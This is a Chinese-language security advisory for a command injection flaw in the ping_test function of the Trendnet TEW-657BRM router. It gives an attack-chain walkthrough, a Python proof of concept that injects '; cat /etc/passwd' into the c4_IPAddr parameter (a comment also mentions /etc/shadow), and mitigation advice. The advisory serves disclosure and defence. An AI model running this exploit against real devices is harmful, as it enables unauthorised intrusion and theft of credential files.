CVE-2026-5353 Trendnet TEW-657BRM 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5353

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Trendnet TEW-657BRM

漏洞概述

Trendnet TEW-657BRM 1.00.1版本被发现存在操作系统命令注入漏洞。该漏洞位于/setup.cgi文件的ping_test功能中，由于对c4_IPAddr参数缺乏严格的过滤，攻击者可构造恶意请求注入并执行任意操作系统命令。鉴于该产品已停止维护且利用代码公开，攻击者可利用此漏洞完全控制设备，造成严重后果。

技术细节

该漏洞属于典型的操作系统命令注入。在Trendnet TEW-657BRM路由器的Web管理界面中，/setup.cgi文件负责处理系统配置，其中包括网络诊断工具ping_test。当用户提交Ping测试请求时，应用程序会将用户提供的IP地址（参数名为c4_IPAddr）直接拼接到底层系统命令中执行，未对输入进行有效的安全过滤或转义。具体而言，攻击者只需具备低权限账户访问权限（PR:L），即可通过网络向目标设备发送特制的HTTP请求。通过在c4_IPAddr字段中插入Shell元字符（如分号;、管道符|或逻辑与&&），攻击者可以截断原有的Ping命令并拼接执行任意恶意指令。由于攻击无需用户交互（UI:N），攻击者可远程利用此漏洞读取敏感文件、篡改系统配置或导致设备拒绝服务，完全控制受影响的路由器。

攻击链分析

STEP 1

侦察与发现

攻击者扫描网络目标，识别出Trendnet TEW-657BRM设备，确认其Web管理界面开放。

STEP 2

获取访问权限

由于CVSS PR:L，攻击者通过弱口令猜测或默认凭证获取低权限账户登录Web管理界面。

STEP 3

构造恶意载荷

攻击者针对/setup.cgi接口，在ping_test功能的c4_IPAddr参数中注入Shell元字符（如; | &），拼接恶意系统命令。

STEP 4

执行命令注入

发送特制的HTTP POST请求，服务器后台将参数直接传递给系统Shell执行，导致恶意代码在设备上运行。

STEP 5

建立控制与持久化

利用执行结果获取敏感信息或进一步植入后门，完全控制路由器并窃取网络流量。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.0.1"
base_url = f"http://{target_ip}/setup.cgi"

# Payload injection: ';' separates commands in Linux shell
# Example: Ping a valid IP then execute 'id' or 'cat /etc/shadow'
payload_ip = "127.0.0.1; cat /etc/passwd"

# Data payload mimicking the ping_test function
# 'c4_IPAddr' is the vulnerable parameter identified in CVE-2026-5353
post_data = {
    "c4_IPAddr": payload_ip,
    "action": "ping_test",
    "submit_button": "Ping"
}

try:
    # Sending the malicious request
    # PR:L implies authentication might be needed, cookies/headers should be added if required
    response = requests.post(base_url, data=post_data, timeout=5)
    
    # Output analysis
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Trendnet TEW-657BRM 1.00.1

防御指南

临时缓解措施

由于该产品已于2011年停止生命周期（EOL），厂商将不会发布安全补丁。唯一的根本解决方法是淘汰并更换受影响的设备。如果暂时无法更换，请务必修改默认管理员密码，通过网络访问控制列表（ACL）严格限制仅允许受信任的IP地址访问Web管理界面，并关闭路由器的远程管理（WAN访问）功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5353
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5353
3 Details https://www.cvedetails.com/cve/CVE-2026-5353/
4 VulDB https://vuldb.com/cve/CVE-2026-5353
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-657brm/ping_test.md
6 Link https://vuldb.com/submit/781566
7 Link https://vuldb.com/vuln/354706
8 Link https://vuldb.com/vuln/354706/cti